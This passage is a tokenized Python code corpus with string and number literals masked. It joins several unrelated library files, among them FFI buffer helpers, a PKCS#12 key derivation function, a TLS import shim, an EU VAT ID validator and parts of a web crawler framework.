string ( buffer ) <EOL> def byte_array ( byte_string ) : <EOL> return byte_string <EOL> def pointer_set ( pointer_ , value ) : <EOL> pointer_ [ <NUM_LIT:0> ] = value <EOL> def array_set ( array , value ) : <EOL> for index , val in enumerate ( value ) : <EOL> array [ index ] = val <EOL> def null ( ) : <EOL> return ffi . NULL <EOL> def is_null ( point ) : <EOL> if point is None : <EOL> return True <EOL> if point == ffi . NULL : <EOL> return True <EOL> if ffi . getctype ( ffi . typeof ( point ) ) == '<STR_LIT>' : <EOL> return False <EOL> if point [ <NUM_LIT:0> ] == ffi . NULL : <EOL> return True <EOL> return False <EOL> def errno ( ) : <EOL> return ffi . errno <EOL> def new ( library , type_ , value = None ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> params = [ ] <EOL> if value is not None : <EOL> params . append ( value ) <EOL> if type_ in set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> return ffi_obj . cast ( type_ , <NUM_LIT:0> ) <EOL> return ffi_obj . new ( type_ , * params ) <EOL> def ref ( value , offset = <NUM_LIT:0> ) : <EOL> return value + offset <EOL> def native ( type_ , value ) : <EOL> if type_ == str_cls : <EOL> return ffi . string ( value ) <EOL> if type_ == byte_cls : <EOL> return ffi . buffer ( value ) [ : ] <EOL> return type_ ( value ) <EOL> def deref ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def unwrap ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def struct ( library , name ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . new ( '<STR_LIT>' % name ) <EOL> def struct_bytes ( struct_ ) : <EOL> return ffi . buffer ( struct_ ) [ : ] <EOL> def struct_from_buffer ( library , name , buffer ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> new_struct_pointer = ffi_obj . new ( '<STR_LIT>' % name ) <EOL> new_struct = new_struct_pointer [ <NUM_LIT:0> ] <EOL> struct_size = sizeof ( library , new_struct ) <EOL> struct_buffer = ffi_obj . buffer ( new_struct_pointer ) <EOL> struct_buffer [ : ] = ffi_obj . 
buffer ( buffer , struct_size ) [ : ] <EOL> return new_struct_pointer <EOL> def array_from_pointer ( library , name , point , size ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> array = ffi_obj . cast ( '<STR_LIT>' % ( name , size ) , point ) <EOL> total_bytes = ffi_obj . sizeof ( array ) <EOL> if total_bytes == <NUM_LIT:0> : <EOL> return [ ] <EOL> output = [ ] <EOL> string_types = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> string_type = name in string_types <EOL> for i in range ( <NUM_LIT:0> , size ) : <EOL> value = array [ i ] <EOL> if string_type : <EOL> value = ffi_obj . string ( value ) <EOL> output . append ( value ) <EOL> return output <EOL> def callback ( library , signature_name , func ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . callback ( signature_name , func ) <EOL> engine = '<STR_LIT>' <EOL> except ( ImportError ) : <EOL> import ctypes <EOL> from ctypes import pointer , c_int , c_char_p , c_uint , c_void_p , c_wchar_p <EOL> _pointer_int_types = int_types + ( c_char_p , ctypes . POINTER ( ctypes . c_byte ) ) <EOL> _pointer_types = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> _type_map = { <EOL> '<STR_LIT>' : c_void_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT:int>' : c_int , <EOL> '<STR_LIT>' : c_uint , <EOL> '<STR_LIT>' : ctypes . c_size_t , <EOL> '<STR_LIT>' : ctypes . c_uint32 , <EOL> } <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> from ctypes import wintypes <EOL> _pointer_types . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } ) <EOL> _type_map . update ( { <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : wintypes . 
ULONG , <EOL> '<STR_LIT>' : wintypes . DWORD , <EOL> '<STR_LIT>' : ctypes . POINTER ( ctypes . c_byte ) , <EOL> } ) <EOL> def _type_info ( library , type_ ) : <EOL> is_double_pointer = type_ [ - <NUM_LIT:3> : ] == '<STR_LIT>' <EOL> if is_double_pointer : <EOL> type_ = type_ [ : - <NUM_LIT:1> ] <EOL> is_pointer = type_ [ - <NUM_LIT:2> : ] == '<STR_LIT>' and type_ not in _pointer_types <EOL> if is_pointer : <EOL> type_ = type_ [ : - <NUM_LIT:2> ] <EOL> is_array = type_ . find ( '<STR_LIT:[>' ) != - <NUM_LIT:1> <EOL> if is_array : <EOL> is_array = type_ [ type_ . find ( '<STR_LIT:[>' ) + <NUM_LIT:1> : type_ . find ( '<STR_LIT:]>' ) ] <EOL> if is_array == '<STR_LIT>' : <EOL> is_array = True <EOL> else : <EOL> is_array = int ( is_array ) <EOL> type_ = type_ [ <NUM_LIT:0> : type_ . find ( '<STR_LIT:[>' ) ] <EOL> if type_ in _type_map : <EOL> type_ = _type_map [ type_ ] <EOL> else : <EOL> type_ = getattr ( library , type_ ) <EOL> if is_double_pointer : <EOL> type_ = ctypes . POINTER ( type_ ) <EOL> return ( is_pointer , is_array , type_ ) <EOL> def register_ffi ( library , ffi_obj ) : <EOL> pass <EOL> def buffer_from_bytes ( initializer ) : <EOL> return ctypes . create_string_buffer ( initializer ) <EOL> def buffer_from_unicode ( initializer ) : <EOL> return ctypes . create_unicode_buffer ( initializer ) <EOL> def write_to_buffer ( buffer , data , offset = <NUM_LIT:0> ) : <EOL> if isinstance ( buffer , ctypes . POINTER ( ctypes . c_byte ) ) : <EOL> ctypes . memmove ( buffer , data , len ( data ) ) <EOL> return <EOL> if offset == <NUM_LIT:0> : <EOL> buffer . value = data <EOL> else : <EOL> buffer . value = buffer . raw [ <NUM_LIT:0> : offset ] + data <EOL> def buffer_pointer ( buffer ) : <EOL> return pointer ( ctypes . cast ( buffer , c_char_p ) ) <EOL> def cast ( library , type_ , value ) : <EOL> is_pointer , is_array , type_ = _type_info ( library , type_ ) <EOL> if is_pointer : <EOL> type_ = ctypes . 
POINTER ( type_ ) <EOL> elif is_array : <EOL> type_ = type_ * is_array <EOL> return ctypes . cast ( value , type_ ) <EOL> def sizeof ( library , value ) : <EOL> return ctypes . sizeof ( value ) <EOL> def bytes_from_buffer ( buffer , maxlen = None ) : <EOL> if isinstance ( buffer , _pointer_int_types ) : <EOL> return ctypes . string_at ( buffer , maxlen ) <EOL> if maxlen is not None : <EOL> return buffer . raw [ <NUM_LIT:0> : maxlen ] <EOL> return buffer . raw <EOL> def byte_string_from_buffer ( buffer ) : <EOL> return buffer . value <EOL> def byte_array ( byte_string ) : <EOL> return ( ctypes . c_byte * len ( byte_string ) ) ( * bytes_to_list ( byte_string ) ) <EOL> def pointer_set ( pointer_ , value ) : <EOL> pointer_ . contents . value = value <EOL> def array_set ( array , value ) : <EOL> for index , val in enumerate ( value ) : <EOL> array [ index ] = val <EOL> def null ( ) : <EOL> return None <EOL> def is_null ( point ) : <EOL> return not bool ( point ) <EOL> def errno ( ) : <EOL> return ctypes . get_errno ( ) <EOL> def new ( library , type_ , value = None ) : <EOL> is_pointer , is_array , type_ = _type_info ( library , type_ ) <EOL> if is_array : <EOL> if is_array is True : <EOL> type_ = type_ * value <EOL> value = None <EOL> else : <EOL> type_ = type_ * is_array <EOL> params = [ ] <EOL> if value is not None : <EOL> params . append ( value ) <EOL> output = type_ ( * params ) <EOL> if is_pointer : <EOL> output = pointer ( output ) <EOL> return output <EOL> def ref ( value , offset = <NUM_LIT:0> ) : <EOL> return ctypes . cast ( ctypes . addressof ( value ) + offset , ctypes . POINTER ( ctypes . c_byte ) ) <EOL> def native ( type_ , value ) : <EOL> if isinstance ( value , type_ ) : <EOL> return value <EOL> if sys . version_info < ( <NUM_LIT:3> , ) and type_ == int and isinstance ( value , int_types ) : <EOL> return value <EOL> if isinstance ( value , ctypes . Array ) and value . _type_ == ctypes . c_byte : <EOL> return ctypes . string_at ( ctypes . 
addressof ( value ) , value . _length_ ) <EOL> return type_ ( value . value ) <EOL> def deref ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def unwrap ( point ) : <EOL> return point . contents <EOL> def struct ( library , name ) : <EOL> return pointer ( getattr ( library , name ) ( ) ) <EOL> def struct_bytes ( struct_ ) : <EOL> return ctypes . string_at ( struct_ , ctypes . sizeof ( struct_ . contents ) ) <EOL> def struct_from_buffer ( library , type_ , buffer ) : <EOL> class_ = getattr ( library , type_ ) <EOL> value = class_ ( ) <EOL> ctypes . memmove ( ctypes . addressof ( value ) , buffer , ctypes . sizeof ( class_ ) ) <EOL> return ctypes . pointer ( value ) <EOL> def array_from_pointer ( library , type_ , point , size ) : <EOL> _ , _ , type_ = _type_info ( library , type_ ) <EOL> array = ctypes . cast ( point , ctypes . POINTER ( type_ ) ) <EOL> output = [ ] <EOL> for i in range ( <NUM_LIT:0> , size ) : <EOL> output . append ( array [ i ] ) <EOL> return output <EOL> def callback ( library , signature_type , func ) : <EOL> return getattr ( library , signature_type ) ( func ) <EOL> engine = '<STR_LIT>' <EOL> class LibraryNotFoundError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FFIEngineError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> import hashlib <EOL> import math <EOL> from asn1crypto . util import int_from_bytes , int_to_bytes <EOL> from . _errors import pretty_message <EOL> from . _types import type_name , byte_cls , int_types <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> chr_cls = chr <EOL> else : <EOL> def chr_cls ( num ) : <EOL> return bytes ( [ num ] ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def pkcs12_kdf ( hash_algorithm , password , salt , iterations , key_length , id_ ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( password , byte_cls ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( password ) <EOL> ) ) <EOL> if not isinstance ( salt , byte_cls ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( salt ) <EOL> ) ) <EOL> if not isinstance ( iterations , int_types ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( iterations ) <EOL> ) ) <EOL> if iterations < <NUM_LIT:1> : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( iterations ) <EOL> ) ) <EOL> if not isinstance ( key_length , int_types ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( key_length ) <EOL> ) ) <EOL> if key_length < <NUM_LIT:1> : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( key_length ) <EOL> ) ) <EOL> if hash_algorithm not in set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( hash_algorithm ) <EOL> ) ) <EOL> if id_ not in set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( id_ ) <EOL> ) ) <EOL> utf16_password = password . decode ( '<STR_LIT:utf-8>' ) . 
encode ( '<STR_LIT>' ) + b'<STR_LIT>' <EOL> algo = getattr ( hashlib , hash_algorithm ) <EOL> u = { <EOL> '<STR_LIT>' : <NUM_LIT:16> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:32> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:64> <EOL> } [ hash_algorithm ] <EOL> if hash_algorithm in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v = <NUM_LIT> <EOL> else : <EOL> v = <NUM_LIT:64> <EOL> d = chr_cls ( id_ ) * v <EOL> s = b'<STR_LIT>' <EOL> if salt != b'<STR_LIT>' : <EOL> s_len = v * int ( math . ceil ( float ( len ( salt ) ) / v ) ) <EOL> while len ( s ) < s_len : <EOL> s += salt <EOL> s = s [ <NUM_LIT:0> : s_len ] <EOL> p = b'<STR_LIT>' <EOL> if utf16_password != b'<STR_LIT>' : <EOL> p_len = v * int ( math . ceil ( float ( len ( utf16_password ) ) / v ) ) <EOL> while len ( p ) < p_len : <EOL> p += utf16_password <EOL> p = p [ <NUM_LIT:0> : p_len ] <EOL> i = s + p <EOL> c = int ( math . ceil ( float ( key_length ) / u ) ) <EOL> a = b'<STR_LIT:\x00>' * ( c * u ) <EOL> for num in range ( <NUM_LIT:1> , c + <NUM_LIT:1> ) : <EOL> a2 = algo ( d + i ) . digest ( ) <EOL> for _ in range ( <NUM_LIT:2> , iterations + <NUM_LIT:1> ) : <EOL> a2 = algo ( a2 ) . digest ( ) <EOL> if num < c : <EOL> b = b'<STR_LIT>' <EOL> while len ( b ) < v : <EOL> b += a2 <EOL> b = int_from_bytes ( b [ <NUM_LIT:0> : v ] ) + <NUM_LIT:1> <EOL> for num2 in range ( <NUM_LIT:0> , len ( i ) // v ) : <EOL> start = num2 * v <EOL> end = ( num2 + <NUM_LIT:1> ) * v <EOL> i_num2 = i [ start : end ] <EOL> i_num2 = int_to_bytes ( int_from_bytes ( i_num2 ) + b ) <EOL> i_num2_l = len ( i_num2 ) <EOL> if i_num2_l > v : <EOL> i_num2 = i_num2 [ i_num2_l - v : ] <EOL> i = i [ <NUM_LIT:0> : start ] + i_num2 + i [ end : ] <EOL> begin = ( num - <NUM_LIT:1> ) * u <EOL> to_copy = min ( key_length , u ) <EOL> a = a [ <NUM_LIT:0> : begin ] + a2 [ <NUM_LIT:0> : to_copy ] + a [ begin + to_copy : ] <EOL> return a [ <NUM_LIT:0> : key_length ] </s>
<s> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> if sys . platform == '<STR_LIT>' : <EOL> from . _osx . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> elif sys . platform == '<STR_LIT:win32>' : <EOL> from . _win . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> else : <EOL> from . _openssl . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> from xml . etree import ElementTree <EOL> import cgi <EOL> try : <EOL> from urllib . request import Request , urlopen <EOL> from urllib . error import HTTPError <EOL> str_cls = str <EOL> except ( ImportError ) : <EOL> from urllib2 import Request , urlopen , HTTPError <EOL> str_cls = unicode <EOL> from . errors import InvalidError , WebServiceError , WebServiceUnavailableError <EOL> def normalize ( vat_id ) : <EOL> """<STR_LIT>""" <EOL> if not vat_id : <EOL> return None <EOL> if not isinstance ( vat_id , str_cls ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if len ( vat_id ) < <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> vat_id = re . sub ( '<STR_LIT>' , '<STR_LIT>' , vat_id ) <EOL> vat_id = vat_id . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> vat_id = vat_id . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> vat_id = vat_id . upper ( ) <EOL> country_prefix = vat_id [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> if country_prefix == '<STR_LIT>' : <EOL> vat_id = '<STR_LIT>' + vat_id [ <NUM_LIT:2> : ] <EOL> country_prefix = '<STR_LIT>' <EOL> if country_prefix not in ID_PATTERNS : <EOL> return None <EOL> return vat_id <EOL> def validate ( vat_id ) : <EOL> """<STR_LIT>""" <EOL> vat_id = normalize ( vat_id ) <EOL> if not vat_id : <EOL> return vat_id <EOL> country_prefix = vat_id [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> number = vat_id [ <NUM_LIT:2> : ] <EOL> if not re . match ( ID_PATTERNS [ country_prefix ] [ '<STR_LIT>' ] , number ) : <EOL> raise InvalidError ( '<STR_LIT>' % country_prefix ) <EOL> if country_prefix == '<STR_LIT>' : <EOL> organization_number = number . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> validation_url = '<STR_LIT>' % organization_number <EOL> try : <EOL> response = urlopen ( validation_url ) <EOL> _ , params = cgi . parse_header ( response . 
headers [ '<STR_LIT:Content-Type>' ] ) <EOL> if '<STR_LIT>' in params : <EOL> encoding = params [ '<STR_LIT>' ] <EOL> else : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> return_json = response . read ( ) . decode ( encoding ) <EOL> info = json . loads ( return_json ) <EOL> if '<STR_LIT>' not in info or info [ '<STR_LIT>' ] != int ( organization_number ) : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> company_name = info [ '<STR_LIT>' ] <EOL> except ( HTTPError ) as e : <EOL> if e . code == <NUM_LIT> : <EOL> raise InvalidError ( '<STR_LIT>' ) <EOL> raise <EOL> else : <EOL> post_data = '''<STR_LIT>''' % ( country_prefix , number ) <EOL> request = Request ( '<STR_LIT>' ) <EOL> request . add_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> try : <EOL> response = urlopen ( request , post_data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except ( HTTPError ) as e : <EOL> if e . code == <NUM_LIT> : <EOL> raise WebServiceUnavailableError ( '<STR_LIT>' ) <EOL> raise <EOL> _ , params = cgi . parse_header ( response . headers [ '<STR_LIT:Content-Type>' ] ) <EOL> if '<STR_LIT>' in params : <EOL> encoding = params [ '<STR_LIT>' ] <EOL> else : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> return_xml = response . read ( ) . decode ( encoding ) <EOL> try : <EOL> envelope = ElementTree . fromstring ( return_xml . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except ( ElementTree . ParseError ) : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> namespaces = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> valid_elements = envelope . findall ( '<STR_LIT>' , namespaces ) <EOL> if not valid_elements : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> name_elements = envelope . findall ( '<STR_LIT>' , namespaces ) <EOL> if not name_elements : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> if valid_elements [ <NUM_LIT:0> ] . text . lower ( ) != '<STR_LIT:true>' : <EOL> raise InvalidError ( '<STR_LIT>' ) <EOL> company_name = name_elements [ <NUM_LIT:0> ] . 
text <EOL> return ( ID_PATTERNS [ country_prefix ] [ '<STR_LIT>' ] , vat_id , company_name ) <EOL> ID_PATTERNS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } </s>
<s> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> from urlparse import urlparse <EOL> if urlparse ( '<STR_LIT>' ) . netloc != '<STR_LIT>' : <EOL> from urlparse import uses_netloc <EOL> uses_netloc . append ( '<STR_LIT>' ) <EOL> if urlparse ( '<STR_LIT>' ) . query != '<STR_LIT>' : <EOL> from urlparse import uses_query <EOL> uses_query . append ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from . lxmlhtml import LxmlLinkExtractor as LinkExtractor </s>
<s> from ants . webservice import JsonRpcResource <EOL> class CrawlerResource ( JsonRpcResource ) : <EOL> ws_name = '<STR_LIT>' <EOL> def __init__ ( self , crawler ) : <EOL> JsonRpcResource . __init__ ( self , crawler , crawler ) </s>
<s> """<STR_LIT>""" <EOL> import xmlrpclib <EOL> from ants . http . request import Request <EOL> from ants . utils . python import get_func_args <EOL> DUMPS_ARGS = get_func_args ( xmlrpclib . dumps ) <EOL> class XmlRpcRequest ( Request ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> encoding = kwargs . get ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT:body>' not in kwargs and '<STR_LIT>' in kwargs : <EOL> kw = dict ( ( k , kwargs . pop ( k ) ) for k in DUMPS_ARGS if k in kwargs ) <EOL> kwargs [ '<STR_LIT:body>' ] = xmlrpclib . dumps ( ** kw ) <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT:POST>' ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> if encoding is not None : <EOL> kwargs [ '<STR_LIT>' ] = encoding <EOL> super ( XmlRpcRequest , self ) . __init__ ( * args , ** kwargs ) <EOL> self . headers . setdefault ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import pprint <EOL> from ants . utils import log <EOL> class StatsCollector ( object ) : <EOL> def __init__ ( self , crawler ) : <EOL> self . _dump = crawler . settings . getbool ( '<STR_LIT>' ) <EOL> self . _stats = { } <EOL> def get_value ( self , key , default = None , spider = None ) : <EOL> return self . _stats . get ( key , default ) <EOL> def get_stats ( self , spider = None ) : <EOL> return self . _stats <EOL> def set_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = value <EOL> def set_stats ( self , stats , spider = None ) : <EOL> self . _stats = stats <EOL> def inc_value ( self , key , count = <NUM_LIT:1> , start = <NUM_LIT:0> , spider = None ) : <EOL> d = self . _stats <EOL> d [ key ] = d . setdefault ( key , start ) + count <EOL> def max_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = max ( self . _stats . setdefault ( key , value ) , value ) <EOL> def min_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = min ( self . _stats . setdefault ( key , value ) , value ) <EOL> def clear_stats ( self , spider = None ) : <EOL> self . _stats . clear ( ) <EOL> def open_spider ( self , spider ) : <EOL> pass <EOL> def close_spider ( self , spider , reason ) : <EOL> if self . _dump : <EOL> log . spider_log ( "<STR_LIT>" + pprint . pformat ( self . _stats ) , <EOL> spider = spider ) <EOL> self . _persist_stats ( self . _stats , spider ) <EOL> def _persist_stats ( self , stats , spider ) : <EOL> pass <EOL> class MemoryStatsCollector ( StatsCollector ) : <EOL> def __init__ ( self , crawler ) : <EOL> super ( MemoryStatsCollector , self ) . __init__ ( crawler ) <EOL> self . spider_stats = { } <EOL> def _persist_stats ( self , stats , spider ) : <EOL> self . spider_stats [ spider . 
name ] = stats <EOL> class DummyStatsCollector ( StatsCollector ) : <EOL> def get_value ( self , key , default = None , spider = None ) : <EOL> return default <EOL> def set_value ( self , key , value , spider = None ) : <EOL> pass <EOL> def set_stats ( self , stats , spider = None ) : <EOL> pass <EOL> def inc_value ( self , key , count = <NUM_LIT:1> , start = <NUM_LIT:0> , spider = None ) : <EOL> pass <EOL> def max_value ( self , key , value , spider = None ) : <EOL> pass <EOL> def min_value ( self , key , value , spider = None ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import lxml . etree <EOL> class Sitemap ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , xmltext ) : <EOL> xmlp = lxml . etree . XMLParser ( recover = True , remove_comments = True , resolve_entities = False ) <EOL> self . _root = lxml . etree . fromstring ( xmltext , parser = xmlp ) <EOL> rt = self . _root . tag <EOL> self . type = self . _root . tag . split ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] if '<STR_LIT:}>' in rt else rt <EOL> def __iter__ ( self ) : <EOL> for elem in self . _root . getchildren ( ) : <EOL> d = { } <EOL> for el in elem . getchildren ( ) : <EOL> tag = el . tag <EOL> name = tag . split ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] if '<STR_LIT:}>' in tag else tag <EOL> if name == '<STR_LIT>' : <EOL> if '<STR_LIT>' in el . attrib : <EOL> d . setdefault ( '<STR_LIT>' , [ ] ) . append ( el . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> d [ name ] = el . text . strip ( ) if el . text else '<STR_LIT>' <EOL> if '<STR_LIT>' in d : <EOL> yield d <EOL> def sitemap_urls_from_robots ( robots_text ) : <EOL> """<STR_LIT>""" <EOL> for line in robots_text . splitlines ( ) : <EOL> if line . lstrip ( ) . startswith ( '<STR_LIT>' ) : <EOL> yield line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] . strip ( ) </s>
